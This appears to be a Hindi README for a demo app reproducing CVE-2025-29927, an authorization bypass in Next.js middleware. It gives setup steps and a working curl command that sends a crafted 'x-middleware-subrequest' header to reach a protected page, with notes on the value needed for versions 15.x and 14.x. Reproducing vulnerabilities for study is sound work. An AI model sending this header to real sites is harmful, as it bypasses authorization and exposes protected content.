
Next.js में प्राधिकरण बायपास भेद्यता CVE-2025-29927 को पुनरुत्पादित करने वाला एक डेमो है।
यह Next.js में प्राधिकरण बायपास भेद्यता को पुनरुत्पादित करने वाला एक डेमो है।
इस भेद्यता के बारे में विवरण के लिए Next.js की भेद्यता CVE-2025-29927 का सारांश देखें।
git clone https://github.com/t3tra-dev/cve-2025-29927-demo.git
cd cve-2025-29927-demo
git pull origin main
npm install
npm run dev
curl आदि का उपयोग करके x-middleware-subrequest हेडर के साथ एक अनुरोध भेजें।curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/protected
इससे प्राधिकरण बायपास होता है और आप /protected पृष्ठ तक पहुँच सकते हैं।
middleware का मान वह नाम है जिसे Next.js मिडलवेयर के रूप में पहचानता है। इस डेमो ऐप में middleware नामक मिडलवेयर मौजूद है, इसलिए इस मान को निर्दिष्ट करने से प्राधिकरण बायपास होता है।
[!TIP] Next.js 15.x में
MAX_RECURSION_DEPTH5 पर सेट है, इसलिए middleware के मान को:से विभाजित करके 5 या अधिक बार दोहराना आवश्यक है। पुराने संस्करण (14.x) में केवल "middleware" ही पर्याप्त था। इस डेमो ऐप में Next.js 15.2.2 का उपयोग किया गया है, इसलिए ऐसे मान की आवश्यकता है।